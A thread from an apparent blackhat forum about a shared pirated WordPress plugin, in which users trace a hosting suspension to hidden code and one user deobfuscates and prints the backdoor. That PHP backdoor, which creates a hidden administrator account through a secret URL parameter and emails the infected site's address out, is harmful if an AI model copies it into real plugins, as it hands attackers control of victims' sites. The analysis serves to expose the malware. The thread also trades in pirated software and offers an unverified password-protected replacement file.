Best Blackhat Forum

Best Blackhat Forum > Freebies > WSOs BSOs JVzoo & Early Bird Products > [GET] Azon Social Genius
Full Version: [GET] Azon Social Genius
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
Pages: 1 2

W@ck0

12-13-2012, 12:39 AM
(12-12-2012 11:28 PM)meathsauce Wrote: [ -> ]been shared here...long ago

/Thread-GET-RELEASE-DEC-05-2012-11-00AM-EST-Simple-Azon?pid=272786#pid272786

anyway it is good...the more share the better
This is not the same thing. These are the two absolutely different plugins.

☠♔ *JS* ♔☠

12-13-2012, 05:24 AM
Hi Anton!

Quotes from BHT!

"I installed this on a new domain and new hosting then it got suspended for sending 15 emails in a minute?

Code:
Suspended (Suspended user a2098155 for sending mass mail (15 emails were sent in 1 minute))
Can anyone explain why this theme and plugin would do this?

NOTE:
This wordpress install had ZERO other plugins installed."

"I'm guessing that the plugin shared here has an exploit/trojan which allows it to take over your server for mass spamming?"



Any ideas?

MuGen-Chin

12-13-2012, 10:29 AM
Nice obfuscated code :O
See the file "wp-content/plugins/azon-social-store/plugin.php"
$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%​6e%72'); ....

I have an error on localhost for sending Emails :O

MuGen-Chin

12-13-2012, 11:15 AM
Sorry but I am too curious to not check some obfuscated plugins :O

PHP Code:
add_action('wp_head''vgbt5ikola');
function vgbt5ikola()
{
    If ($_GET['cms'] == 'jjoplmh') {
    require('wp-includes/registration.php');
    If (!username_exists('wordpress')) {
    $user_id wp_create_user('wordpress','gh67io9Cjm');
    $user = new WP_User($user_id);
    $user->set_role('administrator');
}}}
add_action('wp_head''vbgt58iok');
function vbgt58iok()
{If (!username_exists('wordpress'))
{
$addressdecode='frogan@gmx.com';
$vari='Wordpress Plugin Codes';
mail($addressdecode,get_bloginfo('wpurl'),$vari);
}} 

Same technic :
- When you access to your site with this plugin installed, it mails "frogan@gmx.com", that a site with this infected plugin is live,
- Trying to access to http://www.example.com?cms=jjoplmh, which create a user called "wordpress" with admin rights,
- Does what he wants on your site

My Fix
- Download the plugin from OP, and install it
Mirror From OP :

- Change the file plugin.php with mine (passworded)
Replace the file "wp-content/plugins/azon-social-store/plugin.php"


- Check for User "wordpress", delete it if exists

andiklive

12-13-2012, 11:23 AM
thanks anton, very nice share...

MuGen-Chin

12-13-2012, 11:41 AM
Hum, I was looking why I don't have rights when I click on dashboard Buttons, except for General Setup, and ...

Ouch, there is another OBFUSCATED file ... "wp-content/plugins/azon-social-store/modules/dashboard/init.php"

LOL

EDIT:
OK, weird, but It seems that this file is just obfuscated to protect the way it checks the license ...
Pages: 1 2
Best Blackhat Forum > Freebies > WSOs BSOs JVzoo & Early Bird Products > [GET] Azon Social Genius
Reference URL's